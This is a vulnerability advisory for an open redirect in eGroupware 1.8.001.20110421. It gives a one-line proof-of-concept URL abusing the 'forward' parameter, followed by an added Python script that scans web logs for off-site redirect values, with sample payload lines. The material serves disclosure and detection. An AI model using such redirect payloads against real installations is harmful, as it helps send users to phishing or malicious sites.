------------------------------------------------------------------------
Software................eGroupware 1.8.001.20110421
Vulnerability...........Open Redirect
Threat Level............Low (1/5)
Download................http://www.egroupware.org/
Discovery Date..........5/19/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch
------------------------------------------------------------------------


--Description--

An open redirect in eGroupware 1.8.001.20110421 can be exploited to redirect users to an arbitrary URL.


--PoC--

http://localhost/egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/
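

--Added example: log check--

Added example, not part of the original advisory and not eGroupware code: a Python check that scans web server access logs for requests to the endpoint named in the PoC whose forward parameter points off-site. The log format (Apache combined), the sample lines and the host intranet.example.org are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENDPOINT = "/phpgwapi/ntlm/index.php"   # path from the advisory's PoC
PARAM = "forward"                       # parameter from the advisory's PoC
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def external_target(value, own_hosts):
    """Return the host a forward value points at if it is not in own_hosts, else None."""
    # Normalise what browsers tolerate: backslashes as slashes, stray whitespace/control bytes.
    cleaned = re.sub(r"[\x00-\x20]", "", value.replace("\\", "/"))
    try:
        host = (urlsplit(cleaned).hostname or "").lower()
    except ValueError:
        return "<unparseable>"          # malformed authority: surface it for review
    return host if host and host not in own_hosts else None

def scan(lines, own_hosts):
    """Return a list of (line number, external host) for requests to the redirect endpoint."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(ENDPOINT):
            continue
        for value in parse_qs(target.query).get(PARAM, []):   # parse_qs percent-decodes
            host = external_target(value, own_hosts)
            if host:
                hits.append((number, host))
    return hits

# Constructed sample lines (not real traffic); intranet.example.org is a hypothetical own host.
SAMPLE_LOG = [
    '192.0.2.10 - - [19/May/2011:10:00:01 +0000] "GET /egroupware/phpgwapi/ntlm/index.php?forward=http://www.autosectools.com/ HTTP/1.1" 302 -',
    '192.0.2.11 - - [19/May/2011:10:00:02 +0000] "GET /egroupware/phpgwapi/ntlm/index.php?forward=%2Fegroupware%2Findex.php HTTP/1.1" 302 -',
    '192.0.2.12 - - [19/May/2011:10:00:03 +0000] "GET /egroupware/phpgwapi/ntlm/index.php?forward=%2F%2Fcdn.example.net%2Fx HTTP/1.1" 302 -',
    '192.0.2.13 - - [19/May/2011:10:00:04 +0000] "GET /egroupware/login.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, host in scan(SAMPLE_LOG, {"intranet.example.org"}):
        print(f"line {number}: forward parameter leaves the site -> {host}")
```

Pass the set of hostnames the installation is legitimately served from as own_hosts; relative forward values and values on those hosts are not reported.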